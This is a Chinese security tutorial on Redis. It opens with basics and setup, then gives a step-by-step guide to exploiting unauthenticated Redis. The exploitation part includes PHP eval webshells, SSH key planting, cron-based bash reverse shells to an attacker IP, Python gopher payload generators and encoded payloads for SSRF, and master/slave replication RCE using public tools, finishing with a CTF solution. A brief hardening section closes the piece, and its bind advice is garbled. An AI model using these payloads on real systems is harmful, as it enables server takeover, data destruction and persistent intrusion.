赞
踩
Redis是什么?
Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,Redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是Redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。
Redis运行在内存中但是可以持久化到磁盘,所以在对不同数据集进行高速读写时需要权衡内存,因为数据量不能大于硬件内存。在内存数据库方面的另一个优点是,相比在磁盘上相同的复杂的数据结构,在内存中操作起来非常简单,这样Redis可以做很多内部复杂性很强的事情。同时,在磁盘格式方面他们是紧凑的以追加的方式产生的,因为他们并不需要进行随机访问。
Redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部分场合可以对关系数据库起到很好的补充作用。
Redis基本语法
Redis配置
Redis的配置文件位于Redis安装目录下,文件名为redis.conf(Windows名为redis.windows.conf)。你可以通过CONFIG命令查看或设置配置项。
Redis CONFIG查看配置命令格式如下:
redis 127.0.0.1:6379> CONFIG GET CONFIG_SETTING_NAME
使用 *号获取所有配置项:
- redis 127.0.0.1:6379> CONFIG GET *
-
- 1) "dbfilename"
- 2) "dump.rdb"
- 3) "requirepass"
- 4) ""
- 5) "masterauth"
- 6) ""
- 7) "unixsocket"
- 8) ""
- 9) "logfile"
- ......
编辑配置:
你可以通过修改 redis.conf文件或使用CONFIG set命令来修改配置。
CONFIG SET命令基本语法:
redis 127.0.0.1:6379> CONFIG SET CONFIG_SETTING_NAME NEW_CONFIG_VALUE
实例:
- redis 127.0.0.1:6379> CONFIG SET loglevel "notice"
- OK
- redis 127.0.0.1:6379> CONFIG GET loglevel
-
- 1) "loglevel"
- 2) "notice"
参数说明:
几个redis.conf配置项说明如下:
详情请见:https://www.657260.com/redis/redis-conf.html
Redis命令
Redis命令用于在Redis服务上执行操作。要在Redis服务上执行命令需要一个Redis客户端。Redis客户端在我们之前下载的的Redis的安装包中。
Redis客户端的基本语法为:
$ redis-cli
以下实例讲解了如何启动Redis客户端:
启动Redis客户端,打开终端并输入命令redis-cli。该命令会连接本地的Redis服务。
- $ redis-cli
- redis 127.0.0.1:6379>
- redis 127.0.0.1:6379> PING
-
- PONG
在以上实例中我们连接到本地的Redis服务并执行PING命令,该命令用于检测Redis服务是否启动,如果服务器运作正常的话,会返回一个PONG。
在远程服务上执行命令:
如果需要在远程Redis服务上执行命令,同样我们使用的也是redis-cli命令。
语法:
$ redis-cli -h host -p port -a password
以下实例演示了如何连接到主机为127.0.0.1,端口为6379,密码为mypass的Redis服务上。
- $redis-cli -h 127.0.0.1 -p 6379 -a "mypass"
- redis 127.0.0.1:6379>
- redis 127.0.0.1:6379> PING
-
- PONG
SET命令
Redis SET命令用于设置给定key的值。如果key已经存储其他值, SET就覆写旧值,且无视类型。
Redis SET命令基本语法如下:
redis 127.0.0.1:6379> SET KEY_NAME VALUE
Get命令
Redis Get命令用于获取指定key的值。如果key不存在,返回nil。
Redis Get命令基本语法如下:
redis 127.0.0.1:6379> GET KEY_NAME
Flushall命令
Redis Flushall命令用于清空整个Redis服务器的数据(删除所有数据库的所有key)。
Redis Flushall命令基本语法如下:
redis 127.0.0.1:6379> FLUSHALL
Redis数据备份与恢复
Redis SAVE命令用于创建当前数据库的备份。Save命令执行一个同步保存操作,将当前Redis实例的所有数据快照(snapshot)以默认RDB文件的形式保存到硬盘。
Redis Save命令基本语法如下:
- redis 127.0.0.1:6379> SAVE
- OK
该命令将在Redis安装目录中创建dump.rdb文件。
恢复数据:
如果需要恢复数据,只需将备份文件(dump.rdb)移动到Redis安装目录并启动服务即可。获取Redis目录可以使用CONFIG命令,如下所示:
- redis 127.0.0.1:6379> CONFIG GET dir
- 1) "dir"
- 2) "/usr/local/redis/bin"
以上命令CONFIG GET dir输出的Redis安装目录为/usr/local/redis/bin。
Redis安全
我们可以通过Redis的配置文件设置密码参数,这样客户端连接到Redis服务就需要密码验证,这样可以让你的Redis服务更安全。
我们可以通过以下命令查看是否设置了密码验证:
- 127.0.0.1:6379> CONFIG get requirepass
- 1) "requirepass"
- 2) ""
默认情况下requirepass参数是空的,也就是说默认情况下是无密码验证的,这就意味着你无需通过密码验证就可以连接到Redis服务。
你可以通过以下命令来修改该参数:
- 127.0.0.1:6379> CONFIG set requirepass "657260"
- OK
- 127.0.0.1:6379> CONFIG get requirepass
- 1) "requirepass"
- 2) "657260"
设置密码后,客户端连接Redis服务就需要密码验证,否则无法执行命令。
语法:
AUTH命令基本语法格式如下:
127.0.0.1:6379> AUTH password
该命令用于检测给定的密码和配置文件中的密码是否相符。
Redis Auth命令基本语法如下:
redis 127.0.0.1:6379> AUTH PASSWORD
密码匹配时返回OK ,否则返回一个错误。
实例:
- 127.0.0.1:6379> AUTH "657260"
- OK
- 127.0.0.1:6379> SET mykey "Test value"
- OK
- 127.0.0.1:6379> GET mykey
- "Test value"
Redis环境搭建
第一步:Ubuntu中下载安装Redis并解压:
- wget http://download.redis.io/releases/redis-5.0.12.tar.gz
- tar -zxvf redis-5.0.12.tar.gz
第二步:下载并解压好以后,进入到Redis目录中,执行make,通过make编译的方式来安装:
make
如上图提示"It’s a good idea to run 'make test' "则代表编译安装成功。
第四步:make结束后,进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
- cd src
- cp redis-cli /usr/bin
- cp redis-server /usr/bin
第五步:返回redis-2.8.17目录,将redis.conf拷贝到/etc目录下。
- cd ../
- cp redis.conf /etc
第六步:使用/etc目录下的reids.conf文件中的配置启动Redis服务:
redis-server /etc/redis.conf
Redis未授权访问漏洞
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源IP访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空),会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,可以利用Redis自身的提供的config命令像目标主机写WebShell、写SSH公钥、创建计划任务反弹Shell等。其思路都是一样的,就是先将Redis的本地数据库存放目录设置为web目录、~/.ssh目录或/var/spool/cron目录等,然后将dbfilename(本地数据库文件名)设置为文件名你想要写入的文件名称,最后再执行save或bgsave保存,则我们就指定的目录里写入指定的文件了。
简单说,漏洞的产生条件有以下两点:
Redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源IP访问等相关安全策略,直接暴露在公网。
没有设置密码认证(一般为空),可以免密码远程登录Redis服务。
漏洞危害:
攻击者无需认证就可以访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;
攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件;
最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。
下面我们对Redis未授权访问漏洞进行测试。
实验环境:
攻击机Kali:192.168.43.247
受害机Ubuntu:192.168.43.82
此时受害机Ubuntu中的Redis服务(作为服务端)已经启动了,作为攻击机的kali系统,需要按照之前的步骤同样安装Redis(作为客户端)。安装成功后在攻击机上使用redis客户端直接无账号成功登录Ubuntu上的Redis服务端,并且成功列出服务端Redis的信息:
redis-cli -h 192.168.43.82
利用Redis写入Webshell
利用条件:
服务端的Redis连接存在未授权,在攻击机上能用redis-cli直接登陆连接,并未登陆验证。
开了服务端存在Web服务器,并且知道Web目录的路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限。
我们可以将dir设置为/var/www/html目录,将指定本地数据库存放目录设置为/var/www/html;将dbfilename设置为文件名shell.php,即指定本地数据库文件名为shell.php;再执行save或bgsave,则我们就可以写入一个路径为/var/www/html/shell.php的Webshell文件。
原理就是在数据库中插入一条Webshell数据,将此Webshell的代码作为value,key值随意(x),然后通过修改数据库的默认路径为/var/www/html和默认的缓冲文件shell.php,把缓冲的数据保存在文件里,这样就可以在服务器端的/var/www/html下生成一个Webshell。
操作步骤:
- config set dir /var/www/html/
- config set dbfilename shell.php
- set xxx "<?php eval($_POST[whoami]);?>"
- save
这里需要注意的是第三步写Webshell的时候,可以使用:
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"
\r\n\r\n代表换行的意思,用Redis写入文件的会自带一些版本信息,如果不换行可能会导致无法执行,查看/var/www/html/目录下的shell.php文件内容。如下图所示,写入成功:
蚁剑连接,连接成功:
利用 Redis 写入 SSH 公钥
利用条件:
服务端的Redis连接存在未授权,在攻击机上能用redis-cli直接登陆连接,并未登陆验证。
服务端存在.ssh目录并且有写入的权限。
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。
首先在攻击机的/root/.ssh目录里生成ssh公钥key:
ssh-keygen -t rsa
接着将公钥导入key.txt文件(前后用\n换行,避免和Redis里其他缓存数据混合),再把key.txt文件内容写入服务端Redis的缓冲里:
- (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > /root/.ssh/key.txt
- cat /root/.ssh/key.txt | redis-cli -h 192.168.43.82 -x set xxx
-
- // -x 代表从标准输入读取数据作为该命令的最后一个参数。
然后,使用攻击机连接目标机器Redis,设置Redis的备份路径为/root/.ssh/和保存文件名为authorized_keys,并将数据保存在目标服务器硬盘上:
- redis-cli -h 192.168.43.82
- config set dir /root/.ssh
- config set dbfilename authorized_keys
- save
最后,使用攻击机SSH连接目标受害机即可:
ssh 192.168.43.82
如上图所示,成功连接。
利用Redis写入计划任务
原理就是在数据库中插入一条数据,将计划任务的内容作为value,key值随意,然后通过修改数据库的默认路径为目标主机计划任务的路径,把缓冲的数据保存在文件里,这样就可以在服务器端成功写入一个计划任务进行反弹shell。
首先在攻击机kali上开启监听:
nc -lvp 2333
然后连接服务端的Redis,写入反弹shell的计划任务:
- redis-cli -h 192.168.142.153
- set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.43.247/2333 0>&1\n\n"
- config set dir /var/spool/cron/crontabs/
- config set dbfilename root
- save
如下图所示,经过一分钟以后,在攻击机的nc中成功反弹shell回来:
这个方法只能CentOS上使用,Ubuntu上行不通,原因如下:
因为默认Redis写文件后是644的权限,但Ubuntu要求执行定时任务文件/var/spool/cron/crontabs/<username>权限必须是600也就是-rw-------才会执行,否则会报错(root) INSECURE MODE (mode 0600 expected),而CentOS的定时任务文件/var/spool/cron/<username>权限644也能执行
因为Redis保存RDB会存在乱码,在Ubuntu上会报错,而在CentOS上不会报错
由于系统的不同,crontrab定时文件位置也会不同:
CentOS的定时任务文件在/var/spool/cron/<username>
Ubuntu定时任务文件在/var/spool/cron/crontabs/<username>
Redis未授权访问漏洞在SSRF中的利用
在SSRF漏洞中,如果通过端口扫描等方法发现目标主机上开放6379端口,则目标主机上很有可能存在Redis服务。此时,如果目标主机上的Redis由于没有设置密码认证、没有进行添加防火墙等原因存在未授权访问漏洞的话,那我们就可以利用Gopher协议远程操纵目标主机上的Redis,可以利用Redis自身的提供的config命令像目标主机写WebShell、写SSH公钥、创建计划任务反弹Shell等,其思路都是一样的,就是先将Redis的本地数据库存放目录设置为Web目录、~/.ssh目录或/var/spool/cron目录等,然后将dbfilename(本地数据库文件名)设置为文件名你想要写入的文件名称,最后再执行save或bgsave保存,则我们就指定的目录里写入指定的文件了。
实验环境:
攻击机Kali:192.168.43.247
受害机Ubuntu:192.168.43.82
假设受害机上存在Web服务并且存在SSRF漏洞,通过SSRF进行端口扫描我们发现目标主机在6379端口上运行着一个Redis服务。下面我们就来演示如何通过SSRF漏洞去攻击Redis服务。
绝对路径写WebShell
首先构造Redis命令:
- flushall
- set 1 '<?php eval($_POST["whoami"]);?>'
- config set dir /var/www/html
- config set dbfilename shell.php
- save
然后写一个脚本,将其转化为Gopher协议的格式(脚本时从网上嫖的,谁让我菜呢~~~大佬勿喷):
- import urllib
- protocol="gopher://"
- ip="192.168.43.82"
- port="6379"
- shell="\n\n<?php eval($_POST[\"whoami\"]);?>\n\n"
- filename="shell.php"
- path="/var/www/html"
- passwd="" # 此处也可以填入Redis的密码,在不存在Redis未授权的情况下适用
- cmd=["flushall",
- "set 1 {}".format(shell.replace(" ","${IFS}")),
- "config set dir {}".format(path),
- "config set dbfilename {}".format(filename),
- "save"
- ]
- if passwd:
- cmd.insert(0,"AUTH {}".format(passwd))
- payload=protocol+ip+":"+port+"/_"
- def redis_format(arr):
- CRLF="\r\n"
- redis_arr = arr.split(" ")
- cmd=""
- cmd+="*"+str(len(redis_arr))
- for x in redis_arr:
- cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
- cmd+=CRLF
- return cmd
-
- if __name__=="__main__":
- for x in cmd:
- payload += urllib.quote(redis_format(x))
- print payload
执行该脚本后生成payload如下:
这里将生成的payload要进行url二次编码(因为我们发送payload用的是GET方法),然后利用Ubuntu服务器上的SSRF漏洞,将二次编码后的payload打过去就行了:
ssrf.php?url=gopher%3A%2F%2F192.168.43.82%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252435%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B%2522whoami%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A
如下所示,成功在受害主机上面写入WebShell:
蚁剑连接成功:
写入SSH公钥
同样,我们也可以直接这个存在Redis未授权的主机的~/.ssh目录下写入SSH公钥,直接实现免密登录,但前提是~/.ssh目录存在,如果不存在我们可以写入计划任务来创建该目录。
首先在攻击机的/root/.ssh目录里生成ssh公钥key:
ssh-keygen -t rsa
将生成的id_rsa.pub里的内容复制出来构造Redis命令:
- flushall
- set 1 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC96S69JNdIOUWoHYOvxpnQxHAVZHl25IkDFBzTbDIbJBBABu8vqZg2GFaWhTa2jSWqMZiYwyPimrXs+XU1kbP4P28yFvofuWR6fYzgrybeO0KX7YmZ4xN4LWaZYEeCxzJrV7BU9wWZIGZiX7Yt5T5M3bOKofxTqqMJaRP7J1Fn9fRq3ePz17BUJNtmRx54I3CpUyigcMSTvQOawwTtXa1ZcS056mjPrKHHBNB2/hKINtJj1JX8R5Uz+3six+MVsxANT+xOMdjCq++1skSnPczQz2GmlvfAObngQK2Eqim+6xewOL+Zd2bTsWiLzLFpcFWJeoB3z209solGOSkF8nSZK1rDJ4FmZAUvl1RL5BSe/LjJO6+59ihSRFWu99N3CJcRgXLmc4MAzO4LFF3nhtq0YrIUio0qKsOmt13L0YgSHw2KzCNw4d9Hl3wiIN5ejqEztRi97x8nzAM7WvFq71fBdybzp8eLjiR8oq6ro228BdsAJYevXZPeVxjga4PDtPk= root@kali
- '
- config set dir /root/.ssh/
- config set dbfilename authorized_keys
- save
然后编写脚本,将其转化为Gopher协议的格式:
- import urllib
- protocol="gopher://"
- ip="192.168.43.82"
- port="6379"
- ssh_pub="\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC96S69JNdIOUWoHYOvxpnQxHAVZHl25IkDFBzTbDIbJBBABu8vqZg2GFaWhTa2jSWqMZiYwyPimrXs+XU1kbP4P28yFvofuWR6fYzgrybeO0KX7YmZ4xN4LWaZYEeCxzJrV7BU9wWZIGZiX7Yt5T5M3bOKofxTqqMJaRP7J1Fn9fRq3ePz17BUJNtmRx54I3CpUyigcMSTvQOawwTtXa1ZcS056mjPrKHHBNB2/hKINtJj1JX8R5Uz+3six+MVsxANT+xOMdjCq++1skSnPczQz2GmlvfAObngQK2Eqim+6xewOL+Zd2bTsWiLzLFpcFWJeoB3z209solGOSkF8nSZK1rDJ4FmZAUvl1RL5BSe/LjJO6+59ihSRFWu99N3CJcRgXLmc4MAzO4LFF3nhtq0YrIUio0qKsOmt13L0YgSHw2KzCNw4d9Hl3wiIN5ejqEztRi97x8nzAM7WvFq71fBdybzp8eLjiR8oq6ro228BdsAJYevXZPeVxjga4PDtPk= root@kali\n\n"
- filename="authorized_keys"
- path="/root/.ssh/"
- passwd="" # 此处也可以填入Redis的密码,在不存在Redis未授权的情况下适用
- cmd=["flushall",
- "set 1 {}".format(ssh_pub.replace(" ","${IFS}")),
- "config set dir {}".format(path),
- "config set dbfilename {}".format(filename),
- "save"
- ]
- if passwd:
- cmd.insert(0,"AUTH {}".format(passwd))
- payload=protocol+ip+":"+port+"/_"
- def redis_format(arr):
- CRLF="\r\n"
- redis_arr = arr.split(" ")
- cmd=""
- cmd+="*"+str(len(redis_arr))
- for x in redis_arr:
- cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
- cmd+=CRLF
- return cmd
-
- if __name__=="__main__":
- for x in cmd:
- payload += urllib.quote(redis_format(x))
- print payload
执行该脚本后生成payload,同样将生成的payload进行url二次编码,然后利用受害机上的SSRF打过去:
ssrf.php?url=gopher%3A%2F%2F192.168.43.82%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%2524566%250D%250A%250A%250Assh-rsa%2520AAAAB3NzaC1yc2EAAAADAQABAAABgQC96S69JNdIOUWoHYOvxpnQxHAVZHl25IkDFBzTbDIbJBBABu8vqZg2GFaWhTa2jSWqMZiYwyPimrXs%252BXU1kbP4P28yFvofuWR6fYzgrybeO0KX7YmZ4xN4LWaZYEeCxzJrV7BU9wWZIGZiX7Yt5T5M3bOKofxTqqMJaRP7J1Fn9fRq3ePz17BUJNtmRx54I3CpUyigcMSTvQOawwTtXa1ZcS056mjPrKHHBNB2%2FhKINtJj1JX8R5Uz%252B3six%252BMVsxANT%252BxOMdjCq%252B%252B1skSnPczQz2GmlvfAObngQK2Eqim%252B6xewOL%252BZd2bTsWiLzLFpcFWJeoB3z209solGOSkF8nSZK1rDJ4FmZAUvl1RL5BSe%2FLjJO6%252B59ihSRFWu99N3CJcRgXLmc4MAzO4LFF3nhtq0YrIUio0qKsOmt13L0YgSHw2KzCNw4d9Hl3wiIN5ejqEztRi97x8nzAM7WvFq71fBdybzp8eLjiR8oq6ro228BdsAJYevXZPeVxjga4PDtPk%253D%2520root%2540kali%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252411%250D%250A%2Froot%2F.ssh%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%252415%250D%250Aauthorized_keys%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A
如下图,成功在受害机上面写入SSH公钥:
如下图,SSH连接成功:
创建计划任务反弹Shell
注意:这个只能在CentOS上使用,别的不行,原因上面已经说过了。
构造Redis的命令如下:
- flushall
- set 1 '\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.43.247/2333 0>&1\n\n'
- config set dir /var/spool/cron/
- config set dbfilename root
- save
然后编写脚本,将其转化为Gopher协议的格式:
- import urllib
- protocol="gopher://"
- ip="192.168.43.82"
- port="6379"
- reverse_ip="192.168.43.247"
- reverse_port="2333"
- cron="\n\n\n\n*/1 * * * * bash -i >& /dev/tcp/%s/%s 0>&1\n\n\n\n"%(reverse_ip,reverse_port)
- filename="root"
- path="/var/spool/cron"
- passwd="" # 此处也可以填入Redis的密码,在不存在Redis未授权的情况下适用
- cmd=["flushall",
- "set 1 {}".format(cron.replace(" ","${IFS}")),
- "config set dir {}".format(path),
- "config set dbfilename {}".format(filename),
- "save"
- ]
- if passwd:
- cmd.insert(0,"AUTH {}".format(passwd))
- payload=protocol+ip+":"+port+"/_"
- def redis_format(arr):
- CRLF="\r\n"
- redis_arr = arr.split(" ")
- cmd=""
- cmd+="*"+str(len(redis_arr))
- for x in redis_arr:
- cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
- cmd+=CRLF
- return cmd
-
- if __name__=="__main__":
- for x in cmd:
- payload += urllib.quote(redis_format(x))
- print payload
生成的payload同样进行url二次编码,然后利用Ubuntu服务器上的SSRF打过去,即可在受害机上面写入计划任务,等到时间后,攻击机上就会获得目标主机的Shell。
Redis基于主从复制的命令执行
Redis主从复制
Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机(从机),其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。
Redis主从复制进行RCE
在2019年7月7日结束的WCTF2019 Final上,LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于Redis 4.x/5.x的RCE利用方式,比起以前的利用方式来说,这种利用方式更为通用,危害也更大。
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以在Redis中实现一个新的Redis命令。我们可以通过外部拓展(.so),在Redis中创建一个用于执行系统命令的函数。
实验环境:
攻击机Kali:192.168.43.247
受害机Ubuntu:192.168.43.82
利用redis-rogue-server工具
下载地址:https://github.com/n0b0dyCN/redis-rogue-server
该工具的原理就是首先创建一个恶意的Redis服务器作为Redis主机(master),该Redis主机能够回应其他连接他的Redis从机的响应。有了恶意的Redis主机之后,就会远程连接目标Redis服务器,通过slaveof命令将目标Redis服务器设置为我们恶意Redis的Redis从机(slaver)。然后将恶意Redis主机上的exp同步到Reids从机上,并将dbfilename设置为exp.so。最后再控制Redis从机(slaver)加载模块执行系统命令即可。
但是该工具无法数据Redis密码进行Redis认证,也就是说该工具只能在目标存在Redis未授权访问漏洞时使用。如果目标Redis存在密码是不能使用该工具的。
使用方法:
- python3 redis-rogue-server.py --rhost 192.168.43.82 --lhost 192.168.43.247
- # python3 redis-rogue-server.py --rhost rhost --lhost lhost
执行后,可以选择获得一个交互式的Shell(interactive shell)或者是反弹Shell(reserve shell):
比如我们选择i来获得一个交互式的Shell,执行在里面执行系统命令即可:
也可以选择r来获得一个反弹Shell:
前面说了,该工具只能在目标存在Redis未授权访问漏洞时使用,当目标Redis存在密码时是不能使用该工具的。所以我们还要看看别的工具。
利用 redis-rce 工具
下载地址:https://github.com/Ridter/redis-rce
可以看到该工具有一个-a选项,可以用来进行Redis认证。
但是这个工具里少一个exp.so的文件,我们还需要去上面那个到redis-rogue-server(https://github.com/n0b0dyCN/redis-rogue-server)工具中找到exp.so文件并复制到redis-rce.py同一目录下,然后执行如下命令即可:
- python3 redis-rce.py -r 192.168.43.82 -L 192.168.43.247 -f exp.so -a 657260
-
- # python3 redis-rce.py -r rhost -lhost lhost -f exp.so -a password
执行后,同样可以选择获得一个交互式的Shell(interactive shell)或者是反弹Shell(reserve shell):
比如我们选择i来获得一个交互式的Shell,执行在里面执行系统命令即可:
也可以选择r来获得一个反弹Shell:
Redis主从复制在SSRF中的利用
这里,我们通过[网鼎杯 2020 玄武组]SSRFMe这道CTF题目来演示。
进入题目,给出源码:
- <?php
- function check_inner_ip($url)
- {
- $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
- if (!$match_result)
- {
- die('url fomat error');
- }
- try
- {
- $url_parse=parse_url($url);
- }
- catch(Exception $e)
- {
- die('url fomat error');
- return false;
- }
- $hostname=$url_parse['host'];
- $ip=gethostbyname($hostname);
- $int_ip=ip2long($ip);
- return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
- }
-
- function safe_request_url($url)
- {
-
- if (check_inner_ip($url))
- {
- echo $url.' is inner ip';
- }
- else
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- $output = curl_exec($ch);
- $result_info = curl_getinfo($ch);
- if ($result_info['redirect_url'])
- {
- safe_request_url($result_info['redirect_url']);
- }
- curl_close($ch);
- var_dump($output);
- }
-
- }
- if(isset($_GET['url'])){
- $url = $_GET['url'];
- if(!empty($url)){
- safe_request_url($url);
- }
- }
- else{
- highlight_file(__FILE__);
- }
- // Please visit hint.php locally.
- ?>
这源码见过好多次了,让我们从本地访问hint.php,但是要先绕过对内网IP的检测。这里我们可以利用curl和parse_url的解析差异来绕过,payload:
/?url=http://@127.0.0.1:80@www.baidu.com/hint.php
但是这里并不成功,因为这个方法在Curl较新的版本里被修掉了,所以我们还可以使用另一种方法,即0.0.0.0。0.0.0.0这个IP地址表示整个网络,可以代表本机IPv4的所有地址,使用如下即可绕过:
/?url=http://0.0.0.0/hint.php
如下图所示,成功访问hint.php并得到源码:
在hint.php中发现了Redis的密码为root,看来是要利用主从复制来打Redis了。
需要以下即可工具:
https://github.com/xmsec/redis-ssrf(用于生成Gopher协议的payload并搭建恶意的Redis主机)
https://github.com/n0b0dyCN/redis-rogue-server(需要利用这里面的exp.so)
首先来看redis-ssrf中的ssrf-redis.py脚本:
如上图所示,通过选择不同的mode选项可以选择不同的攻击方式。这里我们选择mode 3,通过主从复制在目标主机上执行命令。需要修改以下几个地方:
将lhost改为攻击者vps的IP(47.xxx.xxx.72),用于控制目标Redis服务器连接位于攻击者vps上6666端口上伪造的恶意Redis主机。
将command修改为要执行的命令
将第140行的“127.0.0.1”改为“0.0.0.0”,用于绕过题目对于内网IP的限制。
最后在第160行填写上Redis的密码“root”。
改完后如下:
然后执行该脚本生成payload:
由于题目需要发送的是GET请求,所以需要将payload进行url二次编码,得到最终的payload为:
gopher%3A%2F%2F0.0.0.0%3A6379%2F_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25244%250D%250Aroot%250D%250A%252A3%250D%250A%25247%250D%250ASLAVEOF%250D%250A%252412%250D%250A47.101.57.72%250D%250A%25244%250D%250A6666%250D%250A%252A4%250D%250A%25246%250D%250ACONFIG%250D%250A%25243%250D%250ASET%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25246%250D%250AMODULE%250D%250A%25244%250D%250ALOAD%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252414%250D%250Acat%2524%257BIFS%257D%2Fflag%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A
然后将redis-rogue-server中的exp.so复制到redis-ssrf目录中,并使用redis-ssrf中的rogue-server.py在攻击者vps的6666端口上面搭建恶意的Redis主机。
但是这里需要写个死循环一直跑rogue-server.py,不然当目标机的Redis连接过来之后,一连上就自动断开连接,可能导致exp.so都没传完就中断了。
- # do.sh
- while [ "1" = "1" ]
- do
- python rogue-server.py
- done
执行do.sh脚本即可:
然后执行之前生成的payload:
如上图所示,成功执行命令并得到flag。
Redis安全防护策略
如何防护你的Redis我认为可以从以下几个方面切入。
禁止监听在公网地址
将你的Redis监听在0.0.0.0的是十分危险的行为,对Redis的大多数攻击也都是由于管理员的大意而将Redis监听在了0.0.0.0。作为一个经常在内网中出现的应用,将Redis监听在0.0.0.0很可能导致内网横向移动渗透风险。
修改Redis监听端口需要在Redis的配置文件redis.conf中进行设置,找到包含bind的行,将默认的bind 0.0.0.0改为bind 0.0.0.0或内网IP,然后重启 Redis。
修改默认的监听端口
Redis默认监听的端口为6379,为了更好地隐藏服务,我们可以在redis.conf中修改Redis的监听端口。找到包含port的行,将默认的6379改为其他自定义的端口号,然后重启Redis。
开启Redis安全认证并设置复杂的密码
为了防止Redis未授权访问攻击以及对Redis密码的爆破,我们可以在Redis在redis.conf配置文件中,通过requirepass选项开启密码认证并设置强密码。
禁止使用Root权限启动
使用Root权限去运行网络服务是比较有风险的,所以不建议使用任Root权限的何用户启动Redis。加固建议如下:
- useradd -s /sbin/nolog -M redis
- sudo -u redis /<redis-server-path>/redis-server /<configpath>/redis.conf
设置Redis配置文件的访问权限
因为 Redis 的明文密码可能会存储在配置文件中,禁止不相关的用户访问改配置文件是必要的,如下设置Redis配置文件权限为600:
chmod 600 /<filepath>/redis.conf
参考链接:
https://blog.csdn.net/cj_Allen/article/details/106855893
https://www.redteaming.top/2019/07/15/浅析Redis中SSRF的利用/#Redis配合gopher协议进行SSRF
https://www.freebuf.com/articles/web/260806.html
文章来源:亿人安全,点击查看原文。
Kubernetes管理员(CKA)培训
